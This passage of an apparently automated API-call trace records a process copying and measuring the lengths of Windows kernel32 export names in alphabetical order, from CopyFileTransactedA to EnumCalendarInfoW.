lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.534] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.534] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.534] lstrlenA (lpString="COPYFILEW") returned 9 [0087.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.534] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.535] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.535] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.535] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.535] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.535] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.535] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.535] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.535] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.535] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.535] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.535] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.535] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.535] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.535] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.535] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.535] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.535] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.535] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.536] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.536] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.536] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.536] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.536] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.536] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.536] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.536] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.536] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.536] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.536] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.536] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.536] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.536] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.536] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.536] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.536] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.536] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.536] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.537] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.537] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.537] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.537] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.537] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.537] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.537] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.537] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.537] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.537] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.537] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.537] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.537] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.537] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.537] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.537] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.537] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.537] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.538] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.538] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.538] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.538] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.538] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.538] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.538] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.538] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.538] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.538] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.538] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.538] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.538] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.538] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.538] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.538] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.538] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.538] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.538] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.539] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.539] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.539] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.539] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.539] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.539] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.539] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.539] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.539] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.539] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.539] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.539] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.539] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.539] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.539] lstrlenA (lpString="DELETEATOM") returned 10 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.539] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.539] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.539] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.540] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.540] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.540] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.540] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.540] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.540] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.540] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.540] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.540] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.540] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.540] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.540] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.540] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.540] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.540] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.540] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.540] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.540] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.540] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.541] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.541] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.541] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.541] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.541] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.541] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.541] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.541] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.541] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.541] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.541] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.541] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.541] lstrlenA 